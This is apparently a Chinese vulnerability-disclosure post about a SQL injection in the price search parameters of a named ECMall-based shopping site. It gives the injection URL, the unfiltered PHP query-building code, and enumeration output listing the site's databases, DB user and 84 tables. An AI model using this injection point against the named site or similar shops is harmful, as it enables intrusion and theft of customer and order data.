http://www.tuutao.com/index.php 土淘网 用的Ecmall的建站模板,用过这个模板的应该都通杀了吧  存在搜索框注入,注入点为: http://www.tuutao.com/index.php?app=store&act=search&id=45&keyword=aaa&min_price=100&max_price=10000 首先将获取get传来的参数,然后组合到一个sql查询语句condition中: 1.search.app.php中的这段代码就是构建查询min和max价格的sql代码,没有过滤:
/**
* 取得查询条件语句
*
* @param array $param 查询参数(参加函数_get_query_param的返回值说明)
* @return string where语句
*/
function _get_goods_conditions($param)
{
/* 组成查询条件 */
$conditions = " g.if_show = 1 AND g.closed = 0 AND s.state = 1"; // 上架且没有被禁售,店铺是开启状态,
if (isset($param['keyword']))
{
$conditions .= $this->_get_conditions_by_keyword($param['keyword'], ENABLE_SEARCH_CACHE);
}
if (isset($param['cate_id']))
{
$conditions .= " AND g.cate_id_{$param['layer']} = '" . $param['cate_id'] . "'";
}
if (isset($param['brand']))
{
$conditions .= " AND g.brand = '" . $param['brand'] . "'";
}
if (isset($param['region_id']))
{
$conditions .= " AND s.region_id = '" . $param['region_id'] . "'";
}
if (isset($param['price']))
{
$min = $param['price']['min'];
$max = $param['price']['max'];
$min > 0 && $conditions .= " AND g.price >= '$min'";
$max > 0 && $conditions .= " AND g.price <= '$max'";
}
return $conditions;
}
2.下面这部分代码是query执行部分,直接将上面的参数带入查询了:
/* 按价格统计 */
if ($total_count > NUM_PER_PAGE)
{
$sql = "SELECT MIN(g.price) AS min, MAX(g.price) AS max FROM {$table} WHERE" . $conditions;
$row = $goods_mod->getRow($sql);
$min = $row['min'];
$max = min($row['max'], MAX_STAT_PRICE);
$step = max(ceil(($max - $min) / PRICE_INTERVAL_NUM), MIN_STAT_STEP);
$sql = "SELECT FLOOR((g.price - '$min') / '$step') AS i, count(*) AS count FROM {$table} WHERE " . $conditions . " GROUP BY i ORDER BY i";
$res = $goods_mod->db->query($sql);
while ($row = $goods_mod->db->fetchRow($res))
{
$data['by_price'][] = array(
'count' => $row['count'],
'min' => $min + $row['i'] * $step,
'max' => $min + ($row['i'] + 1) * $step,
);
}
}
}
3.这个页面上很多参数都没过滤,排查下吧 数据库: available databases [2]: [*] information_schema [*] tuutao 账户: current user: 'tuutao_u@localhost' 数据库tuutao包含的表: Database: tuutao [84 tables] +------------------------+ | _ecm_third_login | | chat_customgroup | | chat_pals | | chat_session | | chat_transfer_fileinfo | | chat_users | | ecm_acategory | | ecm_address | | ecm_ads_left | | ecm_article | | ecm_ative | | ecm_attribute | | ecm_brand | | ecm_cart | | ecm_category_goods | | ecm_category_store | | ecm_collect | | ecm_coupon | | ecm_coupon_sn | | ecm_friend | | ecm_function | | ecm_game | | ecm_gcategory | | ecm_get_prize | | ecm_goods | | ecm_goods_attr | | ecm_goods_image | | ecm_goods_integral | | ecm_goods_qa | | ecm_goods_spec | | ecm_goods_statistics | | ecm_goods_tpl | | ecm_goods_tuijian | | ecm_groupbuy | | ecm_groupbuy_log | | ecm_handsel | | ecm_hdlog | | ecm_integral | | ecm_logistics | | ecm_logistics_conf | | ecm_logsingle | | ecm_mail_queue | | ecm_member | | ecm_member_ofields | | ecm_message | | ecm_module | | ecm_money_logs | | ecm_navigation | | ecm_order | | ecm_order_extm | | ecm_order_goods | | ecm_order_integral | | ecm_order_log | | ecm_pageview | | ecm_partner | | ecm_payment | | ecm_privilege | | ecm_prize | | ecm_promotion | | ecm_promotion_local | | ecm_promotion_log | | ecm_recommend | | ecm_recommended_goods | | ecm_refer | | ecm_region | | ecm_scategory | | ecm_seckill | | ecm_seckill_subject | | ecm_sessions | | ecm_sessions_data | | ecm_sgrade | | ecm_ship | | ecm_shipping | | ecm_specialpage | | ecm_specialpage_goods | | ecm_specify | | ecm_store | | ecm_template | | ecm_third_login | | ecm_timedisc | | ecm_uploaded_file | | ecm_user_coupon | | ecm_user_priv | | ecm_user_prize | +------------------------+
修复方案: 各种过滤 |
-
上一篇: 详解SQL盲注测试高级技巧 - 网站安全 - 自学php
下一篇: Anatomy of an attack: Gaining Reverse Shell from SQL injecti
还没有人抢沙发呢~